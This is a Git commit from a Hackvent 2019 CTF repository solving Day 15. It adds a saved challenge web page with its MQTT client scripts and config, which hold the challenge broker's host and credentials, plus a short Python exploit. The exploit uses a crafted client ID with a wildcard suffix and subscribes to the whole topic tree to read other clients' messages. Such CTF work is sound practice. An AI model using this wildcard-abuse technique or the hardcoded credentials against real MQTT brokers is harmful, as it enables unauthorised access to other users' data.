Roman/Hackvent_2019
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Day 15 solved

Browse Source
This commit is contained in:
Roman Hergenreder 2019-12-16 20:29:35 +01:00
parent 74cc704650
commit 2bc1b72260
11 changed files with 2610 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
Day 15/Santa's workshop.html Normal file
View File

@ -0,0 +1,55 @@
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Santa's workshop</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta charset="utf-8">
<link href="Santa's%20workshop_files/bootstrap.css" rel="stylesheet">
<link href="Santa's%20workshop_files/cover.css" rel="stylesheet">
<script src="Santa's%20workshop_files/countUp.js" type="module"></script>
<script src="Santa's%20workshop_files/count.js" type="module"></script>
<script src="Santa's%20workshop_files/mqttws31.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/jquery.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/config.js" type="text/javascript"></script>
<script src="Santa's%20workshop_files/mqtt.js" type="text/javascript"></script>
<style>
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
}
}
</style>
<script type="text/javascript">
var countUp
$(document).ready(function() {
MQTTconnect();
$("body").click(function(){
$(".alert").hide();
});
});
</script>
</head>
<body class="text-center">
<div id="alert"><div class="alert alert-warning" role="alert" style="display: none;">Uhm.. somebody is currently messing with me. Try refreshing the page. I lost connection but why? 🤔</div></div>
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<main role="main" class="inner cover">
<h1 class="cover-heading">Ho Ho Ho</h1>
<p class="lead">The elves in Santa's workshop <br>
Are busy as can be<br>
They all are working around the clock<br>
On toys for you and me</p>
<img style="float:left" src="Santa's%20workshop_files/gift.svg" width="200">
<h1 style="margin-top: 2.5em;" id="gifts">7.347.622</h1><p class="lead">gifts built by the elves!</p>
</main>
</div>
</body></html>

7
Day 15/Santa's workshop_files/bootstrap.css vendored Normal file
View File

File diff suppressed because one or more lines are too long

15
Day 15/Santa's workshop_files/config.js Normal file
View File

@ -0,0 +1,15 @@
var mqtt;
var reconnectTimeout = 100;
var host = 'whale.hacking-lab.com';
var port = 9001;
var useTLS = false;
var username = 'workshop';
var password = '2fXc7AWINBXyruvKLiX';
var clientid = localStorage.getItem("clientid");
if (clientid == null) {
clientid = ('' + (Math.round(Math.random() * 1000000000000000))).padStart(16, '0');
localStorage.setItem("clientid", clientid);
}
// var topic = 'HV19/gifts/'+clientid;
var topic = 'HV19/gifts/'+clientid+'/flag-tbd';
var cleansession = true;

10
Day 15/Santa's workshop_files/count.js Normal file
View File

@ -0,0 +1,10 @@
import { CountUp } from './countUp.js';
const options = {
separator: '.',
};
countUp = new CountUp('gifts', 0, options);
if (!countUp.error) {
countUp.start();
} else {
console.error(countUp.error);
}

248
Day 15/Santa's workshop_files/countUp.js Normal file
View File

@ -0,0 +1,248 @@
var __assign = (this && this.__assign) || function () {
__assign = Object.assign || function(t) {
for (var s, i = 1, n = arguments.length; i < n; i++) {
s = arguments[i];
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))
t[p] = s[p];
}
return t;
};
return __assign.apply(this, arguments);
};
// playground: stackblitz.com/edit/countup-typescript
var CountUp = /** @class */ (function () {
function CountUp(target, endVal, options) {
var _this = this;
this.target = target;
this.endVal = endVal;
this.options = options;
this.version = '2.0.4';
this.defaults = {
startVal: 0,
decimalPlaces: 0,
duration: 2,
useEasing: true,
useGrouping: true,
smartEasingThreshold: 999,
smartEasingAmount: 333,
separator: ',',
decimal: '.',
prefix: '',
suffix: ''
};
this.finalEndVal = null; // for smart easing
this.useEasing = true;
this.countDown = false;
this.error = '';
this.startVal = 0;
this.paused = true;
this.count = function (timestamp) {
if (!_this.startTime) {
_this.startTime = timestamp;
}
var progress = timestamp - _this.startTime;
_this.remaining = _this.duration - progress;
// to ease or not to ease
if (_this.useEasing) {
if (_this.countDown) {
_this.frameVal = _this.startVal - _this.easingFn(progress, 0, _this.startVal - _this.endVal, _this.duration);
}
else {
_this.frameVal = _this.easingFn(progress, _this.startVal, _this.endVal - _this.startVal, _this.duration);
}
}
else {
if (_this.countDown) {
_this.frameVal = _this.startVal - ((_this.startVal - _this.endVal) * (progress / _this.duration));
}
else {
_this.frameVal = _this.startVal + (_this.endVal - _this.startVal) * (progress / _this.duration);
}
}
// don't go past endVal since progress can exceed duration in the last frame
if (_this.countDown) {
_this.frameVal = (_this.frameVal < _this.endVal) ? _this.endVal : _this.frameVal;
}
else {
_this.frameVal = (_this.frameVal > _this.endVal) ? _this.endVal : _this.frameVal;
}
// decimal
_this.frameVal = Math.round(_this.frameVal * _this.decimalMult) / _this.decimalMult;
// format and print value
_this.printValue(_this.frameVal);
// whether to continue
if (progress < _this.duration) {
_this.rAF = requestAnimationFrame(_this.count);
}
else if (_this.finalEndVal !== null) {
// smart easing
_this.update(_this.finalEndVal);
}
else {
if (_this.callback) {
_this.callback();
}
}
};
// default format and easing functions
this.formatNumber = function (num) {
var neg = (num < 0) ? '-' : '';
var result, x, x1, x2, x3;
result = Math.abs(num).toFixed(_this.options.decimalPlaces);
result += '';
x = result.split('.');
x1 = x[0];
x2 = x.length > 1 ? _this.options.decimal + x[1] : '';
if (_this.options.useGrouping) {
x3 = '';
for (var i = 0, len = x1.length; i < len; ++i) {
if (i !== 0 && (i % 3) === 0) {
x3 = _this.options.separator + x3;
}
x3 = x1[len - i - 1] + x3;
}
x1 = x3;
}
// optional numeral substitution
if (_this.options.numerals && _this.options.numerals.length) {
x1 = x1.replace(/[0-9]/g, function (w) { return _this.options.numerals[+w]; });
x2 = x2.replace(/[0-9]/g, function (w) { return _this.options.numerals[+w]; });
}
return neg + _this.options.prefix + x1 + x2 + _this.options.suffix;
};
this.easeOutExpo = function (t, b, c, d) {
return c * (-Math.pow(2, -10 * t / d) + 1) * 1024 / 1023 + b;
};
this.options = __assign({}, this.defaults, options);
this.formattingFn = (this.options.formattingFn) ?
this.options.formattingFn : this.formatNumber;
this.easingFn = (this.options.easingFn) ?
this.options.easingFn : this.easeOutExpo;
this.startVal = this.validateValue(this.options.startVal);
this.frameVal = this.startVal;
this.endVal = this.validateValue(endVal);
this.options.decimalPlaces = Math.max(0 || this.options.decimalPlaces);
this.decimalMult = Math.pow(10, this.options.decimalPlaces);
this.resetDuration();
this.options.separator = String(this.options.separator);
this.useEasing = this.options.useEasing;
if (this.options.separator === '') {
this.options.useGrouping = false;
}
this.el = (typeof target === 'string') ? document.getElementById(target) : target;
if (this.el) {
this.printValue(this.startVal);
}
else {
this.error = '[CountUp] target is null or undefined';
}
}
// determines where easing starts and whether to count down or up
CountUp.prototype.determineDirectionAndSmartEasing = function () {
var end = (this.finalEndVal) ? this.finalEndVal : this.endVal;
this.countDown = (this.startVal > end);
var animateAmount = end - this.startVal;
if (Math.abs(animateAmount) > this.options.smartEasingThreshold) {
this.finalEndVal = end;
var up = (this.countDown) ? 1 : -1;
this.endVal = end + (up * this.options.smartEasingAmount);
this.duration = this.duration / 2;
}
else {
this.endVal = end;
this.finalEndVal = null;
}
if (this.finalEndVal) {
this.useEasing = false;
}
else {
this.useEasing = this.options.useEasing;
}
};
// start animation
CountUp.prototype.start = function (callback) {
if (this.error) {
return;
}
this.callback = callback;
if (this.duration > 0) {
this.determineDirectionAndSmartEasing();
this.paused = false;
this.rAF = requestAnimationFrame(this.count);
}
else {
this.printValue(this.endVal);
}
};
// pause/resume animation
CountUp.prototype.pauseResume = function () {
if (!this.paused) {
cancelAnimationFrame(this.rAF);
}
else {
this.startTime = null;
this.duration = this.remaining;
this.startVal = this.frameVal;
this.determineDirectionAndSmartEasing();
this.rAF = requestAnimationFrame(this.count);
}
this.paused = !this.paused;
};
// reset to startVal so animation can be run again
CountUp.prototype.reset = function () {
cancelAnimationFrame(this.rAF);
this.paused = true;
this.resetDuration();
this.startVal = this.validateValue(this.options.startVal);
this.frameVal = this.startVal;
this.printValue(this.startVal);
};
// pass a new endVal and start animation
CountUp.prototype.update = function (newEndVal) {
cancelAnimationFrame(this.rAF);
this.startTime = null;
this.endVal = this.validateValue(newEndVal);
if (this.endVal === this.frameVal) {
return;
}
this.startVal = this.frameVal;
if (!this.finalEndVal) {
this.resetDuration();
}
this.determineDirectionAndSmartEasing();
this.rAF = requestAnimationFrame(this.count);
};
CountUp.prototype.printValue = function (val) {
var result = this.formattingFn(val);
if (this.el.tagName === 'INPUT') {
var input = this.el;
input.value = result;
}
else if (this.el.tagName === 'text' || this.el.tagName === 'tspan') {
this.el.textContent = result;
}
else {
this.el.innerHTML = result;
}
};
CountUp.prototype.ensureNumber = function (n) {
return (typeof n === 'number' && !isNaN(n));
};
CountUp.prototype.validateValue = function (value) {
var newValue = Number(value);
if (!this.ensureNumber(newValue)) {
this.error = "[CountUp] invalid start or end value: " + value;
return null;
}
else {
return newValue;
}
};
CountUp.prototype.resetDuration = function () {
this.startTime = null;
this.duration = Number(this.options.duration) * 1000;
this.remaining = this.duration;
};
return CountUp;
}());
export { CountUp };

1
Day 15/Santa's workshop_files/cover.css Normal file
View File

@ -0,0 +1 @@
body,html{height:100%;background-color:#fff}body{display:-ms-flexbox;display:flex;color:#fff;text-shadow:0 .05rem .1rem rgba(0,0,0,.5);box-shadow:inset 0 0 5rem rgba(0,0,0,.5);background-image:url(bg.jpg);background-size:center;background-position:center;background-repeat:no-repeat}h1{color:#a90307}p{color:#000}.cover-container{max-width:42em}.cover{margin:auto 0;padding:0 1.5rem}.cover .btn-lg{padding:.75rem 1.25rem;font-weight:700}#alert{width:100%;position:fixed;top:0;z-index:99999}

48
Day 15/Santa's workshop_files/gift.svg Normal file
View File

@ -0,0 +1,48 @@
<?xml version="1.0" encoding="iso-8859-1"?>
<!-- Generator: Adobe Illustrator 19.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
viewBox="0 0 280.071 280.071" style="enable-background:new 0 0 280.071 280.071;" xml:space="preserve">
<g>
<path style="fill:#BF392C;" d="M232.986,17.729C227.578,6.624,216.316,0,202.901,0C172.326,0,150.641,33.034,140,53.879
C129.332,33.052,107.683,0.21,77.168,0.21c-19.357,0-33.393,13.791-33.393,32.492c0,33.166,31.634,54.807,95.227,54.807
s97.283-27.81,97.283-54.535C236.276,27.67,235.305,22.463,232.986,17.729z M82.559,50.65
c-9.258-5.531-12.557-11.726-12.557-15.699c0-5.075,5.399-8.751,12.837-8.751c17.922,0,40.849,29.438,48.558,43.842
C110.745,68.502,89.612,54.868,82.559,50.65z M208.79,39.668c-4.647,9.381-29.219,28.073-59.917,30.365
c7.745-14.404,30.715-43.842,48.357-43.842c6.826,0,10.746,2.958,12.111,5.723C210.426,34.12,210.243,36.736,208.79,39.668z"/>
<path style="fill:#EFC75E;" d="M280.048,87.552H0.021v70.024h8.751V280.07h262.526V157.577h8.751
C280.048,157.577,280.048,87.552,280.048,87.552z"/>
<path style="fill:#D7B354;" d="M8.772,157.568h262.526v17.502H8.772V157.568z"/>
<path style="fill:#BF392C;" d="M122.533,87.552h35.003v192.519h-35.003C122.533,280.071,122.533,87.552,122.533,87.552z"/>
<rect x="122.533" y="157.568" style="fill:#AC3327;" width="35.003" height="17.502"/>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 1.6 KiB

2
Day 15/Santa's workshop_files/jquery.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

47
Day 15/Santa's workshop_files/mqtt.js Normal file
View File

@ -0,0 +1,47 @@
function MQTTconnect() {
if (typeof path == "undefined") {
path = '';
}
mqtt = new Paho.MQTT.Client(
host,
port,
path,
clientid
);
var options = {
timeout: 3,
keepAliveInterval: 60,
useSSL: useTLS,
cleanSession: cleansession,
onSuccess: onConnect,
onFailure: function (message) {
$('#status').val("Connection failed: " + message.errorMessage + "Retrying");
setTimeout(MQTTconnect, reconnectTimeout);
}
};
mqtt.onConnectionLost = onConnectionLost;
mqtt.onMessageArrived = onMessageArrived;
if (username != null) {
options.userName = username;
options.password = password;
}
mqtt.connect(options);
}
function onConnect() {
mqtt.subscribe(topic, {qos: 0});
}
function onConnectionLost(response) {
setTimeout(MQTTconnect, reconnectTimeout);
$('#alert').html('<div class="alert alert-warning" role="alert">Uhm.. somebody is currently messing with me. Try refreshing the page. I lost connection but why? 🤔</div>');
};
function onMessageArrived(message) {
//var topic = message.destinationName;
var payload = message.payloadString;
countUp.update(payload);
};

2143
Day 15/Santa's workshop_files/mqttws31.js Normal file
View File

File diff suppressed because it is too large Load Diff

34
Day 15/exploit.py Normal file
View File

@ -0,0 +1,34 @@
#!/usr/bin/python
import paho.mqtt.client as mqtt
import time
import random
import logging
def on_connect(client, userdata, flags, rc):
if rc == 0:
path = 'HV19/#';
client.subscribe(path, qos=0)
def on_message(client, userdata, msg):
print(msg.topic, msg.payload)
def on_publish(client, userdata, mid):
print("message published")
def createClient(username, password):
clientId = "%016d/#" % 0
client = mqtt.Client(transport="websockets", client_id=clientId, clean_session=True)
client.username_pw_set(username, password)
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_log = on_log
return client
def on_log(c, userdata, level, buf):
print(str(level), buf)
client = createClient("workshop", "2fXc7AWINBXyruvKLiX")
client.connect("whale.hacking-lab.com", 9001, 100)
client.loop_forever()